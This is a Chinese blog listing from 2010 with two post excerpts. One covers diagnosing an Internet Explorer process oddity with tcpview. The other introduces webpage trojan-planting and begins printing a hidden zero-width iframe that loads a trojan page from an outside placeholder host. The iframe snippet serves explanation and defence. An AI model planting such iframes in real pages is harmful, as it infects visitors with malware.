2010年2月22日

摘要: 1、发现问题    今儿一台机子出现一个很奇怪的问题,打开ie浏览器没有进程,默认应该是出现iexplore进程的,百思不得其解。 2、分析问题   用tcpview查看打开访问网页时是哪个进程建立的tcp连接,竟然是Explore.exe?!一结束,整个window桌面都被结束了,咋回事呢?只有请google了;3、解决问题  google一下,发现我又out了;原来windows提供了一种使i... 阅读全文
posted @ 2010-02-22 19:40 久月 阅读(509) 评论(0) 推荐(0) 编辑
 
摘要: 前篇简单了解了网页挂马和钓鱼的概念和表现,今儿详细看看网页如何挂马,我们如何使用工具分析。  我们知道网页挂马,是在网页文件中插入恶意代码,用户访问被挂马网页时,如果系统没有更新恶意代码利用的漏洞补丁,则会执行恶意程序,执行盗号等危险动作。那么常见的挂马方式有哪些呢? 一、常见挂马方式 1、框架挂马<iframesrc=http://www.xxx.com/muma.htmwidth=0he... 阅读全文
posted @ 2010-02-22 18:58 久月 阅读(1731) 评论(0) 推荐(0) 编辑